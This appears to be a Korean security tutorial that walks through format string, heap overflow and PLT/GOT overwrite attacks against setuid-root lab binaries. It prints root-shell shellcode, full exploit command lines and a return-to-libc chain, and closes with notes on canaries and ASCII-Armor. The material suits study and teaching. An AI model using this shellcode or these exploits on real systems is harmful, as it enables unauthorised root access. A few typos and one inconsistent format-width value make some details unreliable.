Security

Format String Bug란

: buffer overflow 해킹 기법의 한 종류로써 사용자의 입력에 의해서 프로그램의 흐름을 변경 시킬 수 있는 취약점이다

Format String Bug 순서

1. Format String Bug 원리 알기

2. root 계정으로 취약한 파일 만들기

3. 일반 계정으로 환경 변수 구해주는 프로그램 만들기

4. 일반 계정으로 환경 변수에 쉘코드 넣기

5. 덮어쓸 .dtors 주소 구하기

6. 필요 요소 확인

7. 공격 코드 작성

1. Format String Bug 원리 알기

- format string을 정상적으로 사용하게되면 먼저 format string문자를 하나씩 읽는다

- format string인자가 아니라면 바로 출력한다

- format string인자 발견시 esp+4 값의 포인터로 부터 null 값을 만날 때까지 출력한다

- 정상적으로 format string을 사용하지 않았지만 동작에는 문제가 없다

- 위 코드로 작성한 코드를 컴파일하고 동작을 시키면 aaaa를 넣어줬으때 aaaa 가 잘 출력이된다

- 그러나 aaaa뒤에 format string을 붙였을 때 무언가 다른게 출력되는걸 확인할 수 있다

- 이 값은 정상적인 format string 문자를 만났을 때 출력하는 esp+4의 값이다

- 위 원리를 이용하여 format string을 여러 개 사용

- format string 갯수에 따라 계속 esp에서 4byte 씩 올라가 출력할 수 있다 

2. root 계정으로 취약한 파일 만들기

- root 계정으로 setuid 비트를 걸어 놓은 취약한 파일을 작성한다 /tmp/fsb.c

- 파일을 컴파일하고 setuid 비트를 걸어준다

3. 일반 계정으로 환경 변수 구해주는 프로그램 만들기

- 일반 계정으로 환경변수를 입력하면 주소값을 돌려주는 코드를 작성한다 /tmp/env.c

- 컴파일을 해주는데 경고표시가 뜨지만 실행을하면 잘 작동되는걸 볼수있다 

4. 일반 계정으로 환경 변수에 쉘코드 넣기

root권한 획득하고 쉘 실행 시키는 쉘코드

\x31\xc0\x89\xc3\xb0\x17\xcd\x80\xeb\x0f\x5e\x31\xc0\x50\x89\xe2\x56\x89\xe1\x89\xf3\xb0\x0b\xcd\x80\xe8\xec\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68

- 환경 변수에 쉘코드를 넣기전에 언어팩 부터 2byte로 동작하는 한글로 바꿔준다

- 쉘 코드를 perl 스크립트를 이용하여 환경 변수에 넣어주고 주소를 구해준다

5. 덮어쓸 .dtors 주소 구하기

- .dtors를 사용하는 이유는 .dtors가 소멸자이기 때문에 종료되면서 실행 시킬 수 있기 때문이다

- 위 .dtors의 주소가 0x804952c 이고 ffffffff [ 4byte공간 ] 00000000 에 적어줘야 실행한다

- 그러므로 0x804952c 주소에 4bytes를 더해준 0x8049530의 주소를 쓴다

6. 필요 요소 확인

7. 공격 코드 작성

- 쉘 코드 주소를 10진수로 바꾼다

- 쉘 코드 주소를 little endian 방식으로 .dtors 주소에 매핑한다

- buf에 AAAA를 적은 뒤 format string을 사용하여 위치를 찾는다

- format string을 4개 사용하면 buf의 시작 위치에 온다는걸 확인할 수 있다 

공격코드

./fsb "`perl -e 'print "\x30\x95\x04\x08","AAAA","\x32\x95\x04\x08","%8x%8x%65197c","%hn","%49462c","%hn"'`"

설명

- 쉘 코드를 저장할 .dtros의 시작 주소를 적어준다 ( 2byte )

- AAAA를 적어 주는데 이유는 뒤에 나온다

- .dtors의 시작 주소에서 2byte뒤 주소를 적어준다 ( 2byte )

- 첫 번째 format string "%8x"에 사용으로 esp+4의 값을 보고있다

- 두 번째 format string "%8x"에 사용으로 esp+8의 값을 보고있다

- 세 번째 format string "%65137c"에 사용으로 esp+12의 값을 보고있다

%65197c 사용이유

: 앞에 작성된 코드들의 byte수의 합계는 28byte이기 때문에 작성해줘야 할 총 byte수인 65225byte에서 28byte를 뺀 나머지인 65197byte가 사용되어야 한다

( %8x - 8byte, .dotrs 주소 - 4byte, AAAA - 4byte )

- format string %n은 참조 형태가 포인터이고 사용으로 인해 esp+16에 값을 본다

- esp+16의 값이 주소면 지금까지 사용한 byte의 수 만큼의 값을 그 주소 공간에 적어준다 

- %n은 4byte형이기 때문에 절반인 %hn을 사용하여 2byte씩 값을 적게 만들어준다

- format string %49462c의 사용으로 esp+20의 위치를 보는데 이 위치에는 AAAA가 작성되어있다

%49462c 사용 이유

: 앞에 적은 byte가 이미 65225byte이기 때문에 적어야할 49151byte를 이미 초과했다

 format string %hn 사용하면 2byte만 적어주고 나머지는 적지 못하고 버린다는 특징을 이용해 쉘 코드의 뒷 부분인 BFFF에 1을 붙여 1BFFF를 만들어 2byte를 초과 시키고 10진수로 변환해준다

 10진수로 변환하면 114687 나오는데 여기서 앞에 먼저 적어준 65225byte만큼을 빼준 결과인 49462가 사용되는 것이다 ( 빼는 이유는 앞부분에 쓰인 byte까지 포함하기 때문이다 )

- format string %hn을 사용하여 esp+24의 위치를 보게되고 이 곳에는 .dtors의 시작 주소 2byte 뒤 주소가 적혀있다

- esp+24의 값이 주소이기 때문에 그 곳에 지금까지 쓰인 byte의 2byte만큼을 적어준다

- 위 코드를 취약한 함수의 인자로 적어준다

- 코드를 적어주면 위와 같이 쉘이 실행되고 id 명령어를 적으면 root 권한인걸 확인할 수 있다

heap ( 힙 )

- 컴퓨터의 기억 장소에서 그 일부분이 프로그램들에 할당되었다가 회수되는 작용이 되풀이 되는 영역이다 
- 보통 포인터를 통해 동적으로 할당 받고 돌려준다 
- 프로그램 실행시 크기가 결정된다 
- 낮은 주소에서 높은 주소로 할당된다 
- 리스트, 트리, 그래프 등의 동적인 자료구조에 꼭 필요하다 

Heap Buffer Overflow란
: heap 데이터 영역에서 일어나는 buffer overflow를 heap overflow라 부르며 stack에서와 같이 RET 변조는 불가하고 동적 메모리 할당 연결을 덮어씀으로써 프로그램 함수 포인터를 조작한다

Heap Buffer Overflow 순서

1. root 계정에서 취약한 함수를 사용한 파일 작성

2. 일반 계정에서 변수 사이의 거리를 확인

3. 공격 코드 작성

1. root 계정에서 취약한 함수를 사용한 파일 작성

- root 계정에서 취약한 함수가 사용되어진 파일을 작성해준다 /tmp/heap.c

- 컴파일을 해준 후 setuid 비트를 걸어준다

2. 일반 계정에서 변수 사이의 거리를 확인

- root가 만들어 놓은 취약한 프로그램을 같은 글자수로 복사

- gdb를 통해 복사한 파일을 열어주고 intel문법으로 변환 시켜준다

- 첫 번째 변수의 주소는 ebp-4에 닮기고 두 번째 변수의 주소는 ebp-8에 닮기는걸 확인할  수 있다

- ebp-4와 ebp-8의 주소 값을 구하고 큰 수에서 작은 수를 빼면 변수 사이의 거리가 나온다

- 뺏을때 68이란 숫자가 나오는데 이것은 16진수이기 때문에 10진수로 변환하면 104이다

3. 공격 코드 작성

- 공격코드: . /heap `perl -e 'print "A"x104, "/bin/sh"'`

- 공격 코드를 넣으면 변수 사이의 거리만큼 A로 채워진다

- 그 후 두 번째 변수의 시작 부분에 /bin/sh 문자열이 채워져 비교문에 통과하게된다

- system 함수의 의해 쉘이 실행되고 root의 권한인걸 확인할 수 있다

PLT & GOT Overwrite란

: PLT & GOT Overwrite는 Dynamic Link 방식으로 컴파일된 바이너리가 공유 라이브러리를 호출할 때 사용되는 PLT & GOT를 이용하는 공격 기법으로 DEP, ASCII Armor, ASLR의 메모리 보호 기법을 우회하기 위해 사용한다

PLT & GOT Overwrite 원리

: PLT는 GOT를 가리키고 GOT에는 함수의 실제 주소가 들어있는데 이 GOT의 값을 원하는 함수의 실제 주소로 변조시킨다면 원래의 함수가 아닌 변조한 함수를 PLT가 호출할 것이다

PLT & GOT Overwrite 순서

1. Chaining RTL Calls 알기

2. root권한의 취약한 코드 작성

3. 일반 계정에서 root권한 획득하는 공격 코드 작성

4. EBP까지의 거리확인

5. strcpy의 PLT와 puts의 PLT & GOT 확인

6. 공격용 호출 함수 execve 함수의 주소 확인

7. Chaining RTL Calls 확인

8. BSS의 주소 공간 확인 

9. 필요한 주소들 정리

10. 필요한 값이 저장된 주소 공간 찾기

11. 공격 코드 작성

1. Chaining RTL Calls 알기

연속적으로 RTL을 실행하는 기법으로 인자 갯수에 따라 pop과 ret 명령어를 이용하여 사용하는 것으로  strcpy 함수와 같이 인자를 2개 사용하는 경우에는 pop-pop-ret을 사용하여 연속적으로 함수를 호출하여 메모리 위에 덮어 씌우는 기법이다

2. root권한의 취약한 코드 작성

3. 일반 계정에서 root권한 획득하는 공격 코드 작성

4. EBP까지의 거리확인

5. strcpy의 PLT와 puts의 PLT & GOT 확인

6. 공격용 호출 함수 execve 함수의 주소 확인

7. Chaining RTL Calls 확인

8. BSS의 주소 공간 확인 

9. 필요한 주소들 정리

10. 필요한 값이 저장된 주소 공간 찾기

execve - 0x43814550

11. 공격 코드 작성

순서

1) execve를 puts@got자리에 복사

2) /tmp/sh0을 BSS에 복사

3) puts@plt를 통해 execve 호출 및 BSS에 저장된 인자 전달

4) 공격 코드를 개행 없이 붙여서 취약한 함수가 들어있는 파일에 인자로 전달

아래 코드를 개행 없이 이어 붙여서 인자로 넣어주면 잘 동작하는걸 확인할 수 있다

./bof "`perl -e 'print "A"x112,

"\x10\x83\x04\x08", "\xee\x84\x04\x08", "\x10\xa0\x04\x08", "\x18\x80\x04\x08",
"\x10\x83\x04\x08", "\xee\x84\x04\x08", "\x11\xa0\x04\x08", "\x01\x80\x04\x08",
"\x10\x83\x04\x08", "\xee\x84\x04\x08", "\x12\xa0\x04\x08", "\x5d\x80\x04\x08",
"\x10\x83\x04\x08", "\xee\x84\x04\x08", "\x13\xa0\x04\x08", "\x77\x82\x04\x08",

"\x10\x83\x04\x08", "\xee\x84\x04\x08", "\x30\xa0\x04\x08", "\x54\x81\x04\x08",
"\x10\x83\x04\x08", "\xee\x84\x04\x08", "\x31\xa0\x04\x08", "\xf6\x80\x04\x08",
"\x10\x83\x04\x08", "\xee\x84\x04\x08", "\x32\xa0\x04\x08", "\x5f\x82\x04\x08",
"\x10\x83\x04\x08", "\xee\x84\x04\x08", "\x33\xa0\x04\x08", "\x4a\x82\x04\x08",
"\x10\x83\x04\x08", "\xee\x84\x04\x08", "\x34\xa0\x04\x08", "\x54\x81\x04\x08",
"\x10\x83\x04\x08", "\xee\x84\x04\x08", "\x35\xa0\x04\x08", "\x62\x81\x04\x08",
"\x10\x83\x04\x08", "\xee\x84\x04\x08", "\x36\xa0\x04\x08", "\xd8\x80\x04\x08",
"\x10\x83\x04\x08", "\xee\x84\x04\x08", "\x37\xa0\x04\x08", "\x07\x80\x04\x08",

"\x20\x83\x04\x08", "AAAA", "\x30\xa0\x04\x08", "\x07\x80\x04\x08"x2'`"

CANARY란

: buffer overflow를 모니터하기 위해 buffer와 제어 데이터 사이에 설정된 값으로 buffer overflow가 발생하면 CANARY 값이 손상되며 데이터의 검증의 실패하여 overflow에 대한 경고가 출력되고 손상된 데이터를 무효화 처리한다

ASCII-Armor란

: 공유 라이브버리 영역의 상위 주소에 0x00을 포함시키는 방법으로 RTL 공격에 대응하기 위한 방법이다 

상위 주소에 0x00이 들어가기 때문에 strcpy()와 같이 buffer overflow에서 사용하는 취약한 함수들을 사용할 때 문자열인 null 값으로 인식하여 종료되어 원하는 동작을 할 수 없게 만든다